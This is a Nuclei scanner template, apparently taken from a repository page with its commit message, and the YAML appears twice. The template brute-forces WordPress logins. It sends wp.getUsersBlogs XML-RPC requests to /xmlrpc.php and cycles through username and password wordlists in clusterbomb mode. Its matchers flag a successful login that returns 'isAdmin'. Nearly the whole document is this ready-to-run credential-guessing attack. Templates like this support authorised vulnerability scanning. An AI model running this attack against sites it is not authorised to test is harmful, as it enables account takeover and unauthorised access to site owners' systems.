nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml

id: wordpress-xmlrpc-brute-force

info:
  name: Wordpress XMLRPC.php username and password Bruteforcer
  author: Exid
  severity: high
  description: Ths template bruteforces username and passwords through xmlrpc.php being available.
  reference:
    - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
    - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
  tags: wordpress,php,xmlrpc,fuzz

requests:
  - raw:
      - |
        POST /xmlrpc.php HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 235

        <?xml version="1.0" encoding="UTF-8"?>
         <methodCall>
           <methodName>wp.getUsersBlogs</methodName>
           <params>
             <param>
               <value>{{username}}</value>
             </param>
               <param>
             <value>{{password}}</value>
               </param>
           </params>
         </methodCall>

    attack: clusterbomb
    payloads:
      username: helpers/wordlists/wp-users.txt
      password: helpers/wordlists/wp-passwords.txt

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - 'url'
          - 'xmlrpc'
          - 'isAdmin'
        condition: and
Added wordpress-xmlrpc-brute-force.yaml (#3445) * wp-xmlrpc-brute-force.yaml file was added A Nuclei template for bruteforcing username and password through XMLRPC. * wp-xmlrpc-brute-force.yaml file added A Nuclei template for wordpress username and password Bruteforcing throught xmlrpc.php * wp-xmlrpc-brute-force.yaml file added A Nuclei template for wordpress username and password Bruteforcing throught xmlrpc.php * Revert "wp-xmlrpc-brute-force.yaml file was added" This reverts commit c0e4ca75a6ddbcf65e9443849a05c7b8f2625af9. * few fixes * Added wordpress user and pass list * improved matcher Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2021-12-29 16:34:23 +00:00			`id: wordpress-xmlrpc-brute-force`

			`info:`
			`name: Wordpress XMLRPC.php username and password Bruteforcer`
			`author: Exid`
			`severity: high`
			`description: Ths template bruteforces username and passwords through xmlrpc.php being available.`
			`reference:`
			`- https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c`
			`- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/`
			`tags: wordpress,php,xmlrpc,fuzz`

			`requests:`
			`- raw:`
			`- \|`
			`POST /xmlrpc.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Length: 235`

			`<?xml version="1.0" encoding="UTF-8"?>`
			`<methodCall>`
			`<methodName>wp.getUsersBlogs</methodName>`
			`<params>`
			`<param>`
			`<value>{{username}}</value>`
			`</param>`
			`<param>`
			`<value>{{password}}</value>`
			`</param>`
			`</params>`
			`</methodCall>`

			`attack: clusterbomb`
			`payloads:`
			`username: helpers/wordlists/wp-users.txt`
			`password: helpers/wordlists/wp-passwords.txt`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`part: body`
			`words:`
			`- 'url'`
			`- 'xmlrpc'`
			`- 'isAdmin'`
			`condition: and`